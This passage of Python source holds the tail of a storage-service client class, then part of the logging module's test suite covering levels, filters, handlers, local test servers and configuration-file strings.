res = { "error": "Error parsing data", "message": e.__doc__, "exception": e }
except Exception as e:
res = { "error": "Error sending data", "message": e.__doc__, "exception": e }
if cb and res:
res["response"] = r
self.lock.acquire()
cb(res)
self.lock.release()
def save(self, file, obj, callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": None, "id": "_data", "value": obj, "password": password }
self.sendData(self.server + "/store/save", data, callback)
def merge(self, file, obj, callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": "merge", "id": "_data", "value": obj, "password": password }
self.sendData(self.server + "/store/save", data, callback)
def delete(self, file, callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": "delete", "id": "_data", "password": password }
self.sendData(self.server + "/store/save", data, callback)
def load(self, file, callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": None, "id": "_data", "password": password }
self.sendData(self.server + "/store/load", data, callback)
def list(self, file="", callback=None, password=None):
data = { "key": self.m_apiKey, "file": file, "options": "list", "id": "_data", "password": password }
self.sendData(self.server + "/store/load", data, callback)
def upload(self, data, name, mimetype, callback=None, password=None):
data = { "key": self.m_apiKey, "password": password }
self.sendData(self.server + "/upload-2", None, callback, data=data, files=[("file", (name, data, mimetype))])
|
test_logging.py
|
# Copyright 2001-2013 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2013 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import datetime
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import select
import socket
import struct
import sys
import tempfile
from test.support import (captured_stdout, run_with_locale, run_unittest,
patch, requires_zlib, TestHandler, Matcher)
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asynchat
import asyncore
import errno
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog
except ImportError:
win32evtlog = None
try:
import win32evtlogutil
except ImportError:
win32evtlogutil = None
win32evtlog = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except socket.error: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
h.handle(r)
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
old_stderr = sys.stderr
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
sys.stderr = sio = io.StringIO()
h.handle(r)
self.assertIn('\nRuntimeError: deliberate mistake\n',
sio.getvalue())
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
h.handle(r)
self.assertEqual('', sio.getvalue())
finally:
logging.raiseExceptions = old_raise
sys.stderr = old_stderr
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPChannel(smtpd.SMTPChannel):
"""
This derived class has had to be created because smtpd does not
support use of custom channel maps, although they are allowed by
asyncore's design. Issue #11959 has been raised to address this,
and if resolved satisfactorily, some of this code can be removed.
"""
def __init__(self, server, conn, addr, sockmap):
asynchat.async_chat.__init__(self, conn, sockmap)
self.smtp_server = server
self.conn = conn
self.addr = addr
self.data_size_limit = None
self.received_lines = []
self.smtp_state = self.COMMAND
self.seen_greeting = ''
self.mailfrom = None
self.rcpttos = []
self.received_data = ''
self.fqdn = socket.getfqdn()
self.num_bytes = 0
try:
self.peer = conn.getpeername()
except socket.error as err:
# a race condition may occur if the other end is closing
# before we can get the peername
self.close()
if err.args[0] != errno.ENOTCONN:
raise
return
self.push('220 %s %s' % (self.fqdn, smtpd.__version__))
self.set_terminator(b'\r\n')
self.extended_smtp = False
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
channel_class = TestSMTPChannel
def __init__(self, addr, handler, poll_interval, sockmap):
self._localaddr = addr
self._remoteaddr = None
self.data_size_limit = None
self.sockmap = sockmap
asyncore.dispatcher.__init__(self, map=sockmap)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
self.set_socket(sock, map=sockmap)
# try to re-use a server port if possible
self.set_reuse_addr()
self.bind(addr)
self.port = sock.getsockname()[1]
self.listen(5)
except:
self.close()
raise
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def handle_accepted(self, conn, addr):
"""
Redefined only because the base class does not pass in a
map, forcing use of a global in :mod:`asyncore`.
"""
channel = self.channel_class(self, conn, addr, self.sockmap)
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self.sockmap)
except select.error:
# On FreeBSD 8, closing the server repeatably
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except socket.error as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except socket.error:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
TIMEOUT = 8.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer(('localhost', 0), self.process_message, 0.001,
sockmap)
server.start()
addr = ('localhost', server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT) # 14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
